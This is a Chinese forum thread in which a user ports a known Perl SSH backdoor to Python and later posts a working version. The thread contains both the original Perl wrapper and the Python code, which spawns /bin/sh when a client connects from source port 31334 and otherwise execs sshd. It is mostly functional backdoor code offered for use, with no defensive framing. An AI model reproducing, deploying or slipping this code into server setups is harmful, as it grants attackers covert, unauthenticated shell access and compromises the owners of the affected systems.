当前位置: 文江博客话题详情

这个perl脚本的stdin的内容的判断?

发布于 2022-09-11 21:25:37 字数 1192 浏览 27 评论 0

问题出现的环境背景及自己尝试过哪些方法

有个linux 程序运行传参(socket)的问题,
有个perl中间件脚本如下:

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..zf/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

我用python实现这个功能,卡在了重写第一句的条件判断处。perl是用了getpeername的方法来从stdin中取到了信息,我不知道怎么查看这个stdin,于是查perl的资料知道getpeername()是根据socket fd来获得remote address + port:
*POSIX::getpeername allows you to get peername from sockfd.
来自 https://metacpan.org/pod/POSI...*

我按照这个思路用python的os模块实现却没有成果,

#!/usr/bin/python3.5
import os
import socket
import subprocess
import sys

for s in sys.stdin:

        raddr = os.read(s,100)
        if re.match(r'..zf',raddr):
                os.execv("/bin/sh")
                with open("hello.log","a+") as f:
                        f.write(str(raddr))

os.execv('/usr/bin/sshd',sys.argv)

我的查询结果对吗?这个stdin是一个打开的socket文件描述符么也就是个非负整数么?

PS : 这个perl脚本的来源

一款短小精致的SSH后门分析 - FreeBuf互联网安全新媒体平台
https://www.freebuf.com/artic... 问题描述

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(2

一花一树开 2022-09-18 21:25:37

In the end, I implemented my purpose according to the answer . This is my code, although there will be a warning at runtime,but it works~

#!/usr/bin/python3.5
import os
import socket
import subprocess
import sys

s = socket.socket(fileno = sys.stdin.fileno())

try:
    n = s.getpeername()
except:
    pass
else:
    raddr = n[1]
    if raddr == 31334:
        subprocess.run(["/bin/sh"])
        #sys.exit()
        
os.execv('/usr/bin/sshd',sys.argv)

and the warning is "class 'Exception' : [Errno 88] Socket operation on non-socket ", I am also little confused about this information, I am very happy to listen to some analysis about this.

Considering that someone might be interested in the specific content of stdin on this issue, I paste it below

<socket.socket fd=0, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=('192.168.8.199', 22), raddr=('192.168.8.240', 31334)>
回复
眼泪也成诗 2022-09-18 21:25:37

OS的fd是个整数,语言里的stdin可能是个对象

os.read得到的肯定不是raddr,看看python的socket api吧

回复
~没有更多了~

关于作者

万人眼中万个我

暂无简介

0 文章
0 评论
22 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

烙印

文章 0 评论 0

singlesman

文章 0 评论 0

给自己一个微笑

文章 0 评论 0

独孤求败

文章 0 评论 0

晨钟暮鼓

文章 0 评论 0

我是自愿种绣球花的

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文